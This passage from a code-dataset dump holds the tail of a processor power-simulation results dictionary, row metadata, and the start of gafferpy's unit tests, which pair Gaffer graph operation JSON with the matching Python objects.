'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0542338,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 3.2835,
'Instruction Fetch Unit/Runtime Dynamic': 0.109897,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0418086,
'L2/Runtime Dynamic': 0.0124139,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 1.91422,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.342888,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0219057,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0219056,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.01766,
'Load Store Unit/Runtime Dynamic': 0.472824,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0540158,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.108031,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0191704,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0197958,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.063152,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.006386,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.252192,
'Memory Management Unit/Runtime Dynamic': 0.0261818,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 13.3175,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0659386,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0032183,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0263421,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.095499,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 1.70481,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0233442,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.221024,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.132974,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.0534981,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.0862904,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0435565,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.183345,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.0408007,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.13286,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0251216,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00224395,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0246857,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0165954,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0498073,
'Execution Unit/Register Files/Runtime Dynamic': 0.0188393,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0578433,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.159149,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 0.987734,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 4.47676e-05,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 4.47676e-05,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 3.91457e-05,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 1.52378e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000238394,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.000367075,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.000423753,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0159536,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.01478,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0390004,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0541855,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 3.28255,
'Instruction Fetch Unit/Runtime Dynamic': 0.10993,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0420224,
'L2/Runtime Dynamic': 0.0125557,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 1.91408,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.343009,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0219013,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0219014,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.0175,
'Load Store Unit/Runtime Dynamic': 0.472921,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0540048,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.10801,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0191665,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0197953,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.0630956,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.00640077,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.252129,
'Memory Management Unit/Runtime Dynamic': 0.026196,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 13.3165,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0660832,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0032179,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0263098,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.0956109,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 1.70495,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 8.547924110383947,
'Runtime Dynamic': 8.547924110383947,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.455911,
'Runtime Dynamic': 0.177455,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 60.4616,
'Peak Power': 93.5738,
'Runtime Dynamic': 9.51406,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 60.0057,
'Total Cores/Runtime Dynamic': 9.3366,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.455911,
'Total L3s/Runtime Dynamic': 0.177455,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
| 75.137856
| 124
| 0.682203
| 8,095
| 68,676
| 5.781717
| 0.067449
| 0.123411
| 0.112813
| 0.093327
| 0.938337
| 0.930432
| 0.918061
| 0.886546
| 0.862338
| 0.842745
| 0
| 0.132551
| 0.22411
| 68,676
| 914
| 125
| 75.137856
| 0.745801
| 0
| 0
| 0.642232
| 0
| 0
| 0.65677
| 0.048051
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4334d1e159afdbc3a801eb83f5e94613b461ca09
| 197,972
|
py
|
Python
|
python-shell/src/test/test_gaffer_operations.py
|
sw96411/gaffer-tools
|
2dd4ff64cf6afa1dd3f9529977d7170370b11f58
|
[
"Apache-2.0"
] | null | null | null |
python-shell/src/test/test_gaffer_operations.py
|
sw96411/gaffer-tools
|
2dd4ff64cf6afa1dd3f9529977d7170370b11f58
|
[
"Apache-2.0"
] | null | null | null |
python-shell/src/test/test_gaffer_operations.py
|
sw96411/gaffer-tools
|
2dd4ff64cf6afa1dd3f9529977d7170370b11f58
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright 2016-2019 Crown Copyright
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import unittest
from gafferpy import gaffer as g
class GafferOperationsTest(unittest.TestCase):
examples = [
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.add.AddElements",
"validate" : true,
"skipInvalidElements" : false,
"input" : [ {
"group" : "entity",
"vertex" : 6,
"properties" : {
"count" : 1
},
"class" : "uk.gov.gchq.gaffer.data.element.Entity"
}, {
"group" : "edge",
"source" : 5,
"destination" : 6,
"directed" : true,
"properties" : {
"count" : 1
},
"class" : "uk.gov.gchq.gaffer.data.element.Edge"
} ]
}
''',
g.AddElements(
skip_invalid_elements=False,
input=[
g.Entity(
vertex=6,
properties={'count': 1},
group="entity"
),
g.Edge(
destination=6,
source=5,
group="edge",
properties={'count': 1},
directed=True
)
],
validate=True
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.add.AddElementsFromFile",
"filename" : "filename",
"elementGenerator" : "uk.gov.gchq.gaffer.doc.operation.generator.ElementGenerator",
"parallelism" : 1,
"validate" : true,
"skipInvalidElements" : false
}
''',
g.AddElementsFromFile(
parallelism=1,
validate=True,
element_generator="uk.gov.gchq.gaffer.doc.operation.generator.ElementGenerator",
filename="filename",
skip_invalid_elements=False
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.add.AddElementsFromKafka",
"topic" : "topic1",
"groupId" : "groupId1",
"bootstrapServers" : [ "hostname1:8080,hostname2:8080" ],
"elementGenerator" : "uk.gov.gchq.gaffer.doc.operation.generator.ElementGenerator",
"parallelism" : 1,
"validate" : true,
"skipInvalidElements" : false
}
''',
g.AddElementsFromKafka(
topic="topic1",
parallelism=1,
skip_invalid_elements=False,
validate=True,
bootstrap_servers=[
"hostname1:8080,hostname2:8080"
],
element_generator="uk.gov.gchq.gaffer.doc.operation.generator.ElementGenerator",
group_id="groupId1"
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.add.AddElementsFromSocket",
"hostname" : "localhost",
"port" : 8080,
"elementGenerator" : "uk.gov.gchq.gaffer.doc.operation.generator.ElementGenerator",
"parallelism" : 1,
"validate" : true,
"skipInvalidElements" : false,
"delimiter" : ","
}
''',
g.AddElementsFromSocket(
validate=True,
element_generator="uk.gov.gchq.gaffer.doc.operation.generator.ElementGenerator",
parallelism=1,
delimiter=",",
hostname="localhost",
skip_invalid_elements=False,
port=8080
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.CountGroups"
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(),
g.CountGroups()
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.CountGroups",
"limit" : 5
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(),
g.CountGroups(
limit=5
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.resultcache.ExportToGafferResultCache"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.DiscardOutput"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.resultcache.GetGafferResultCacheExport",
"key" : "ALL"
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(),
g.ExportToGafferResultCache(),
g.DiscardOutput(),
g.GetGafferResultCacheExport(
key="ALL"
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.resultcache.ExportToGafferResultCache"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.DiscardOutput"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.job.GetJobDetails"
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(),
g.ExportToGafferResultCache(),
g.DiscardOutput(),
g.GetJobDetails()
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.resultcache.GetGafferResultCacheExport",
"jobId" : "0f47bc2a-547d-4990-9104-04a8dd64e588",
"key" : "ALL"
} ]
}
''',
g.OperationChain(
operations=[
g.GetGafferResultCacheExport(
job_id="0f47bc2a-547d-4990-9104-04a8dd64e588",
key="ALL"
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.resultcache.ExportToGafferResultCache",
"key" : "edges"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.DiscardOutput"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.resultcache.ExportToGafferResultCache",
"key" : "entities"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.DiscardOutput"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.GetExports",
"getExports" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.resultcache.GetGafferResultCacheExport",
"key" : "edges"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.resultcache.GetGafferResultCacheExport",
"key" : "entities"
} ]
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(),
g.ExportToGafferResultCache(
key="edges"
),
g.DiscardOutput(),
g.GetAllElements(),
g.ExportToGafferResultCache(
key="entities"
),
g.DiscardOutput(),
g.GetExports(
get_exports=[
g.GetGafferResultCacheExport(
key="edges"
),
g.GetGafferResultCacheExport(
key="entities"
)
]
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements",
"view" : {
"edges" : {
"edge" : { }
},
"entities" : { }
}
}, {
"class" : "uk.gov.gchq.gaffer.operation.export.graph.ExportToOtherAuthorisedGraph",
"graphId" : "graph2"
} ]
}
''',
g.OperationChain(
